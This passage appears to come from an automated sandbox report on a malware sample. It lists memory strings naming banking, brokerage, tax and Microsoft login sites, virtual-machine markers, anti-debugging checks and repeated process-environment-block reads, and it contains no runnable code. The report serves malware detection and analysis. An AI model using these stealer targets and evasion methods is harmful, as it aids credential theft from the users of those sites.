            Source: -16743.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ive Brokers - GDCDYNVMware20,116
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,1169648w
            Source: -16743.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: global block list test formVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.co.inVMware20,11696487552~
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11
            Source: -16743.8.dr Binary or memory string: AMC password management pageVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: firefox.exe, 0000000B.00000002.2853412077.000002B6B18EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: -16743.8.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: -16743.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: -16743.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,9
            Source: -16743.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: -16743.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: -16743.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578311230.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
            Source: -16743.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: -16743.8.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: -16743.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: -16743.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: -16743.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: -16743.8.dr Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: -16743.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: -16743.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: -16743.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: -16743.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: -16743.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe API call chain: ExitProcess graph end node graph_1-98744
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe API call chain: ExitProcess graph end node graph_1-98315
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\convert.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004176E3 LdrLoadDll, 2_2_004176E3
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008841FD BlockInput, 1_2_008841FD
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00813B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00813B4C
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00845CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00845CCC
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0088C304 LoadLibraryA,GetProcAddress, 1_2_0088C304
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_02443460 mov eax, dword ptr fs:[00000030h] 1_2_02443460
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_024434C0 mov eax, dword ptr fs:[00000030h] 1_2_024434C0
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_02441E70 mov eax, dword ptr fs:[00000030h] 1_2_02441E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h] 2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300634F mov eax, dword ptr fs:[00000030h] 2_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h] 2_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h] 2_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h] 2_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h] 2_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h] 2_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h] 2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h] 2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h] 2_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h] 2_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h] 2_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300625D mov eax, dword ptr fs:[00000030h]2_2_0300625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]2_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030062D6 mov eax, dword ptr fs:[00000030h]2_2_030062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F280A0 mov eax, dword ptr fs:[00000030h]2_2_02F280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
